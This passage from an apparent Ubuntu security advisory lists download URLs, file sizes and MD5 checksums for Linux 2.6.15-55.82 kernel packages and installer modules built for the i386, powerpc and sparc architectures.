http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb
  Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb
  Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb
  Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
  Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb
  Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb
  Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb
  Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb
  Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb
  Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
  Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb
  Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    53554 afc415fd0a28c363579986fc48464671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     6024 b0a622b932e40a7011d5e9ec9bd21eb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    98468 ddb974591a687460f50c26a2e2682593
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   299158 458051a07217501718f6e2a742bec0a3

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    51536 d2c7a02ac033097208c359312e95d246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2482 3c964c577c93d80cee55d06e78003951
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40906 84f84dc75718a347eb6623204cab6209
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    29892 4a807f384985ae3376d509474716f13a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    45054 a2373aac90339698b2cba11e43978565
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     1934 0887612df6acbc867949c33251427c00
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2198 d38a4ec22579275ff2f48805be734356
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   161908 70564b18529d383509cb4c1d4898425a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
  Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
  Size/MD5:   872596 8602056ab95806f02667587737cb3b59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
  Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb
  Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
  Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
  Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
  Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    17386 1abc2376b554610aec23e87f60998358
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    85854 59c8914383ae0624690950d8f844c101
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    60378 183583ac6a0ab738109499861a861ca2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    70420 da9263ada0b850362f022c36b6769f22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   115790 ac0661102201e3f682eda1052d987671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   168082 6f375034031b861fe42ba973c9390ded
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    40380 c083f0781fb33b64329d10c233affde2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   149304 958f0b630326763cddddce5503f3319d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
  Size/MD5:   773010 979da22c264d122841ea140319b365ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
  Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea
